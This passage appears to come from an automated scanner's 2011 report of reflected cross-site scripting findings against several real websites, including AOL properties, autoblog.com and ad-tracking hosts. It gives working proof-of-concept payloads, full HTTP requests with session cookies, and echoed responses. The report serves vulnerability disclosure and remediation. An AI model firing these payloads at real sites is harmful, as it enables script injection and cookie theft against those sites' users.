10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Date: Sun, 06 Feb 2011 20:38:14 GMT Expires: Sun, 06 Feb 2011 20:38:15 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDCCQTRADB=BJFKINMCIAFIFOKPEBOLGODF; path=/ X-Powered-By: ASP.NET Content-Length: 999 Connection: keep-alive
The value of the campaignId request parameter is copied into the HTML document as plain text between tags. The payload 3872b<script>alert(1)</script>508553eaf6f was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=44418&campaignId=60353872b<script>alert(1)</script>508553eaf6f&adRotationId=14567&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Date: Sun, 06 Feb 2011 20:38:08 GMT Expires: Sun, 06 Feb 2011 20:38:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDAQTQSBDB=ABKFHBNCCDOGEAKPCMKCCBHA; path=/ X-Powered-By: ASP.NET Content-Length: 996 Connection: keep-alive
The value of the siteId request parameter is copied into the HTML document as plain text between tags. The payload 6e2c7<script>alert(1)</script>ecfd5510463 was submitted in the siteId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=18046e2c7<script>alert(1)</script>ecfd5510463&syndicationOutletId=44418&campaignId=6035&adRotationId=14567&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Date: Sun, 06 Feb 2011 20:38:07 GMT Expires: Sun, 06 Feb 2011 20:38:07 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDQAQRAADB=AMBBLJHDLNPJPAHAJKBIOLFH; path=/ X-Powered-By: ASP.NET Content-Length: 997 Connection: keep-alive
The value of the syndicationOutletId request parameter is copied into the HTML document as plain text between tags. The payload 2f6c5<script>alert(1)</script>9b9dc606334 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=444182f6c5<script>alert(1)</script>9b9dc606334&campaignId=6035&adRotationId=14567&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Date: Sun, 06 Feb 2011 20:38:07 GMT Expires: Sun, 06 Feb 2011 20:38:07 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDQSDSSCBB=AMKDELMCPLOBBHMIPCAAEIPL; path=/ X-Powered-By: ASP.NET Content-Length: 999 Connection: keep-alive
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 30f97<script>alert(1)</script>daaff63cbfb was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlets/getPlaylist?ver=2.0&client=fcas3_1.12.2.2.BETA.AOL&fv=WIN%2010,1,103,22&attr=[Domain,fanhouse.com][Autoplay,false][adamid,none]&baudit=server&tname=AutoplayOff&crlen=t&nwid=278524&content=NO_VIDEO_URL&format=Video-Flash-400-400x300®ions=StandardBanner&uid=95293821230f97<script>alert(1)</script>daaff63cbfb&level=Sports:nfl&audit=param&resp=SMIL&pu=http%3A//www.fanhouse.com/%3Ff9308%2522-alert%28document.cookie%29-%2522caa87257aff%3D1 HTTP/1.1 Host: web.lightningcast.net Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=295&flashID=myaolExperience&bgcolor=%23FFFFFF&playerID=43942763001&publisherID=1612833736&isVid=true&isUI=true&autoStart=false&%40videoList=64092604001&wmode=transparent Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:39:47 GMT Server: Apache/2.2.6 (Fedora) Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Expires: -1 Connection: close P3P: policyref="http://web.lightningcast.net/w3c/p3p.xml",CP="NON DSP COR CURa TAIo PSDo OUR IND PHY DEM STA LOC" Content-Type: application/smil Content-Length: 757
The value of the template request parameter is copied into the HTML document as plain text between tags. The payload ff2c5<script>alert(1)</script>dafbfb81510 was submitted in the template parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /modular.jsp?template=1386ff2c5<script>alert(1)</script>dafbfb81510&view=190752&pollId=191044&a... HTTP/1.1 Host: webcenter.polls.aol.com Proxy-Connection: keep-alive Referer: http://www.fanhouse.com/?f9308%22-alert(document.cookie)-%22caa87257aff=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
The value of the 3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f0d"><script>alert(1)</script>6f15c085aa8 was submitted in the 3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255=120f0d"><script>alert(1)</script>6f15c085aa8 HTTP/1.1 Host: www.aisledash.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_getnr%3D1297023866964-New%7C1360095866964%3B%20s_nrgvo%3DNew%7C1360095867077%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.73bc; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.73bc
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.aisledash.com/?3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255=120f0d"><script>alert(1)</script>6f15c085aa8" /> ...[SNIP]...
1.229. http://www.aisledash.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.aisledash.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3418b"><script>alert(1)</script>3224aeef255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?3418b"><script>alert(1)</script>3224aeef255=1 HTTP/1.1 Host: www.aisledash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.aisledash.com/?3418b"><script>alert(1)</script>3224aeef255=1" /> ...[SNIP]...
1.230. http://www.aolhealth.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.aolhealth.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efb95"><script>alert(1)</script>2a680ac5448 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?efb95"><script>alert(1)</script>2a680ac5448=1 HTTP/1.1 Host: www.aolhealth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65d49"><script>alert(1)</script>6681fd48a3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /encyclopedia65d49"><script>alert(1)</script>6681fd48a3a/health/ HTTP/1.1 Host: www.aolhealth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f82e"%3b98c2b66b2ac was submitted in the REST URL parameter 2. This input was echoed as 6f82e";98c2b66b2ac in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /encyclopedia/health6f82e"%3b98c2b66b2ac/ HTTP/1.1 Host: www.aolhealth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.or ...[SNIP]... kExternalLinks="true"; s_265.channel="us.health"; s_265.prop1="Condition Center | Health Encyclopedia"; s_265.pfxID="hth"; s_265.prop2="Main"; s_265.prop12="http://www.aolhealth.com/encyclopedia/health6f82e";98c2b66b2ac/"; s_265.prop17=""; s_265.prop18=""; s_265.mmxgo=true; s_265.disablepihost=false; s_265.disablepipath=false; s_265.mmxtitle="Health Encyclopedia Main"; s_265.linkInternalFilters="javascript:,aolhealth ...[SNIP]...
1.233. http://www.aolhealth.com/encyclopedia/health/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.aolhealth.com
Path:
/encyclopedia/health/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4201</script><a>59aed720f83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /encyclopedia/health/?f4201</script><a>59aed720f83=1 HTTP/1.1 Host: www.aolhealth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16acd"><script>alert(1)</script>eb6bf6a9a5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /traffic16acd"><script>alert(1)</script>eb6bf6a9a5f/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Fefb95%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E2a680ac5448%3D1%2F&cb=1412981861 HTTP/1.1 Host: www.aolhealth.com Proxy-Connection: keep-alive Referer: http://www.aolhealth.com/?efb95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2a680ac5448=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=6b8c6d74611ee49286741aa7af24e81b; s_pers=%20s_getnr%3D1297023979342-New%7C1360095979342%3B%20s_nrgvo%3DNew%7C1360095979389%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:25:43 GMT Server: Apache/2.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 43221
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.aolhealth.com/traffic16acd"><script>alert(1)</script>eb6bf6a9a5f/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Fefb95%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E2a680ac5448%3D1%2F&cb=1412981861"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d1d4"><img%20src%3da%20onerror%3dalert(1)>2fa0f835869 was submitted in the REST URL parameter 2. This input was echoed as 1d1d4"><img src=a onerror=alert(1)>2fa0f835869 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /story/egypt-regime-offers-new-concessions-to1d1d4"><img%20src%3da%20onerror%3dalert(1)>2fa0f835869/1550027 HTTP/1.1 Host: www.aolnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7180"%3bd6f4da479f4 was submitted in the REST URL parameter 2. This input was echoed as e7180";d6f4da479f4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/egypt-regime-offers-new-concessions-toe7180"%3bd6f4da479f4/1550027 HTTP/1.1 Host: www.aolnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aba1d"%3bf4c36a25637 was submitted in the REST URL parameter 2. This input was echoed as aba1d";f4c36a25637 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/the-rise-and-fall-of-a-foreclosure-kingaba1d"%3bf4c36a25637/1567480 HTTP/1.1 Host: www.aolnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c010a"><img%20src%3da%20onerror%3dalert(1)>4971c98bf8c was submitted in the REST URL parameter 2. This input was echoed as c010a"><img src=a onerror=alert(1)>4971c98bf8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /story/the-rise-and-fall-of-a-foreclosure-kingc010a"><img%20src%3da%20onerror%3dalert(1)>4971c98bf8c/1567480 HTTP/1.1 Host: www.aolnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... <meta property="og:url" content="http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-kingc010a"><img src=a onerror=alert(1)>4971c98bf8c/1567480" /> ...[SNIP]...
1.239. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.autoblog.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcaf5"><script>alert(1)</script>04f9219082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?fcaf5"><script>alert(1)</script>04f9219082=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.autoblog.com/?fcaf5"><script>alert(1)</script>04f9219082=1"/> ...[SNIP]...
1.240. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.autoblog.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6c46"-alert(1)-"8a56f02ab0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b6c46"-alert(1)-"8a56f02ab0f=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df24d"><img%20src%3da%20onerror%3dalert(1)>1e853498656 was submitted in the REST URL parameter 3. This input was echoed as df24d"><img src=a onerror=alert(1)>1e853498656 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /2011/02/06df24d"><img%20src%3da%20onerror%3dalert(1)>1e853498656/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="referer" value="http://www.autoblog.com:1080/2011/02/06df24d"><img src=a onerror=alert(1)>1e853498656/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/"> ...[SNIP]...
1.242. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65d60"><script>alert(1)</script>1b28de94597 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
